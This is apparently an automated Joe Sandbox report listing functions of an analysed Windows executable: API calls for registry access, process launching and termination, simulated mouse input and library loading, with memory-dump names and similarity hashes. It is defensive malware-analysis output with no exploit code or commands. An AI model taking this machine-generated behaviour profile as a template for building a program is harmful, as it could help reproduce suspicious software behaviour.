• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
• String ID:
• API String ID: 1992179935-0
• Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
• Instruction ID: 2c598a40381f2492768444f96f4bdf7be1bc6ccd73234e1178452827bf539725
• Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
• Instruction Fuzzy Hash: 27810B71600769DBE720EE69EC45B6EB3E9AF45320F24812EF511D7683E778D90087E4
APIs
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00718649,00718649,?,?,?,007267C2,00000001,00000001,8BE85006), ref: 007265CB
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,007267C2,00000001,00000001,8BE85006,?,?,?), ref: 00726651
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0072674B
• __freea.LIBCMT ref: 00726758
  • Part of subcall function 00723B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00716A79,?,0000015D,?,?,?,?,007185B0,000000FF,00000000,?,?), ref: 00723BC5
• __freea.LIBCMT ref: 00726761
• __freea.LIBCMT ref: 00726786
Memory Dump Source
• Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
Similarity
• API ID: ByteCharMultiWide__freea$AllocateHeap
• String ID:
• API String ID: 1414292761-0
• Opcode ID: 26e7ba2eb6ceeadd7976d5e5afe8be45ad350a317c02d9b098e26d4e912c6d98
• Instruction ID: 6e3d56fb385cdf25a7ddcc4b5bbd87e71650203c05bf12a00463513a94a3ca9e
• Opcode Fuzzy Hash: 26e7ba2eb6ceeadd7976d5e5afe8be45ad350a317c02d9b098e26d4e912c6d98
• Instruction Fuzzy Hash: 0951E672600226AFEB258F64FC85EBB77AAEF40714F15466AFC04D6240EB3DDC5086A0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006FB329: _wcslen.LIBCMT ref: 006FB333
                                                                                                                                                                                                                                                                                • Part of subcall function 0077D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0077C10E,?,?), ref: 0077D415
                                                                                                                                                                                                                                                                                • Part of subcall function 0077D3F8: _wcslen.LIBCMT ref: 0077D451
                                                                                                                                                                                                                                                                                • Part of subcall function 0077D3F8: _wcslen.LIBCMT ref: 0077D4C8
                                                                                                                                                                                                                                                                                • Part of subcall function 0077D3F8: _wcslen.LIBCMT ref: 0077D4FE
                                                                                                                                                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0077C72A
                                                                                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0077C785
                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0077C7CA
                                                                                                                                                                                                                                                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0077C7F9
                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0077C853
                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0077C85F
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 1120388591-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(00000035), ref: 007500A9
                                                                                                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00750150
                                                                                                                                                                                                                                                                              • VariantCopy.OLEAUT32(00750354,00000000), ref: 00750179
                                                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(00750354), ref: 0075019D
                                                                                                                                                                                                                                                                              • VariantCopy.OLEAUT32(00750354,00000000), ref: 007501A1
                                                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 007501AB
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3859894641-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00766F21
                                                                                                                                                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 0076707E
                                                                                                                                                                                                                                                                              • CoCreateInstance.OLE32(00790CC4,00000000,00000001,00790B34,?), ref: 00767095
                                                                                                                                                                                                                                                                              • CoUninitialize.OLE32 ref: 00767319
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                                                                                                                              • String ID: .lnk
                                                                                                                                                                                                                                                                              • API String ID: 886957087-24824748
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 007611B3
                                                                                                                                                                                                                                                                              • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 007611EE
                                                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 0076120A
                                                                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00761283
                                                                                                                                                                                                                                                                              • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0076129A
                                                                                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 007612C8
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3368777196-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0074FBEF,00000000,?,?,00000000,?,007339E2,00000004,00000000,00000000), ref: 00788CA7
                                                                                                                                                                                                                                                                              • EnableWindow.USER32(?,00000000), ref: 00788CCD
                                                                                                                                                                                                                                                                              • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00788D2C
                                                                                                                                                                                                                                                                              • ShowWindow.USER32(?,00000004), ref: 00788D40
                                                                                                                                                                                                                                                                              • EnableWindow.USER32(?,00000001), ref: 00788D66
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00788D8A
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 642888154-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetForegroundWindow.USER32(?,?,00000000), ref: 00772D45
                                                                                                                                                                                                                                                                                • Part of subcall function 0076EF33: GetWindowRect.USER32(?,?), ref: 0076EF4B
                                                                                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 00772D6F
                                                                                                                                                                                                                                                                              • GetWindowRect.USER32(00000000), ref: 00772D76
                                                                                                                                                                                                                                                                              • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00772DB2
                                                                                                                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 00772DDE
                                                                                                                                                                                                                                                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00772E3C
Memory Dump Source
• Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2387181109-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • IsWindowVisible.USER32(?), ref: 007555F9
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00755616
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0075564E
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0075566C
                                                                                                                                                                                                                                                                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00755674
                                                                                                                                                                                                                                                                              • _wcsstr.LIBVCRUNTIME ref: 0075567E
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 72514467-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006F5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006F55D1,?,?,00734B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 006F5871
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 007662C0
                                                                                                                                                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 007663DA
                                                                                                                                                                                                                                                                              • CoCreateInstance.OLE32(00790CC4,00000000,00000001,00790B34,?), ref: 007663F3
                                                                                                                                                                                                                                                                              • CoUninitialize.OLE32 ref: 00766411
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                                                                                                                                                                              • String ID: .lnk
                                                                                                                                                                                                                                                                              • API String ID: 3172280962-24824748
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,007136E9,00713355), ref: 00713700
                                                                                                                                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0071370E
                                                                                                                                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00713727
                                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,007136E9,00713355), ref: 00713779
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00714D53,00000000,?,?,007168E2,?,?,00000000), ref: 007230EB
                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0072311E
                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00723146
                                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,00000000), ref: 00723153
                                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,00000000), ref: 0072315F
                                                                                                                                                                                                                                                                              • _abort.LIBCMT ref: 00723165
Memory Dump Source
• Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3160817290-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006F1F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 006F1F87
                                                                                                                                                                                                                                                                                • Part of subcall function 006F1F2D: SelectObject.GDI32(?,00000000), ref: 006F1F96
                                                                                                                                                                                                                                                                                • Part of subcall function 006F1F2D: BeginPath.GDI32(?), ref: 006F1FAD
                                                                                                                                                                                                                                                                                • Part of subcall function 006F1F2D: SelectObject.GDI32(?,00000000), ref: 006F1FD6
                                                                                                                                                                                                                                                                              • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 007894AA
                                                                                                                                                                                                                                                                              • LineTo.GDI32(?,00000003,00000000), ref: 007894BE
                                                                                                                                                                                                                                                                              • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 007894CC
                                                                                                                                                                                                                                                                              • LineTo.GDI32(?,00000000,00000003), ref: 007894DC
                                                                                                                                                                                                                                                                              • EndPath.GDI32(?), ref: 007894EC
                                                                                                                                                                                                                                                                              • StrokePath.GDI32(?), ref: 007894FC
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 43455801-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 006F32AF
                                                                                                                                                                                                                                                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 006F32B7
                                                                                                                                                                                                                                                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 006F32C2
                                                                                                                                                                                                                                                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 006F32CD
                                                                                                                                                                                                                                                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 006F32D5
                                                                                                                                                                                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 006F32DD
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Virtual
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 4278518827-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0075F447
                                                                                                                                                                                                                                                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0075F45D
                                                                                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 0075F46C
                                                                                                                                                                                                                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0075F47B
                                                                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0075F485
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0075F48C
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 839392675-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetClientRect.USER32(?), ref: 007334EF
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001328,00000000,?), ref: 00733506
                                                                                                                                                                                                                                                                              • GetWindowDC.USER32(?), ref: 00733512
                                                                                                                                                                                                                                                                              • GetPixel.GDI32(00000000,?,?), ref: 00733521
                                                                                                                                                                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00733533
                                                                                                                                                                                                                                                                              • GetSysColor.USER32(00000005), ref: 0073354D
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 272304278-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 007521CC
                                                                                                                                                                                                                                                                              • UnloadUserProfile.USERENV(?,?), ref: 007521D8
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 007521E1
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 007521E9
                                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 007521F2
                                                                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 007521F9
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 146765662-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • ShellExecuteExW.SHELL32(0000003C), ref: 0077B903
                                                                                                                                                                                                                                                                                • Part of subcall function 006F41EA: _wcslen.LIBCMT ref: 006F41EF
                                                                                                                                                                                                                                                                              • GetProcessId.KERNEL32(00000000), ref: 0077B998
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0077B9C7
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                                                                                                                                                                              • String ID: <$@
                                                                                                                                                                                                                                                                              • API String ID: 146682121-1426351568
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007848D1
                                                                                                                                                                                                                                                                              • IsMenu.USER32(?), ref: 007848E6
                                                                                                                                                                                                                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0078492E
                                                                                                                                                                                                                                                                              • DrawMenuBar.USER32 ref: 00784941
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                                                                                              • API String ID: 3076010158-4108050209
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006FB329: _wcslen.LIBCMT ref: 006FB333
                                                                                                                                                                                                                                                                                • Part of subcall function 007545FD: GetClassNameW.USER32(?,?,000000FF), ref: 00754620
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 007527B3
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 007527C6
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 007527F6
                                                                                                                                                                                                                                                                                • Part of subcall function 006F8577: _wcslen.LIBCMT ref: 006F858A
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSend$_wcslen$ClassName
                                                                                                                                                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                              • API String ID: 2081771294-1403004172
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00783A29
                                                                                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(?), ref: 00783A30
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00783A45
                                                                                                                                                                                                                                                                              • DestroyWindow.USER32(?), ref: 00783A4D
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                                                                                                                                                              • String ID: SysAnimate32
                                                                                                                                                                                                                                                                              • API String ID: 3529120543-1011021900
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0071508E,?,?,0071502E,?,007B98D8,0000000C,00715185,?,00000002), ref: 007150FD
                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00715110
                                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,0071508E,?,?,0071502E,?,007B98D8,0000000C,00715185,?,00000002,00000000), ref: 00715133
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32 ref: 0074E785
                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0074E797
                                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 0074E7BD
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                              • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                                                                                                                                                                              • API String ID: 145871493-2590602151
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?,006F668B,?,?,006F62FA,?,00000001,?,?,00000000), ref: 006F664A
                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 006F665C
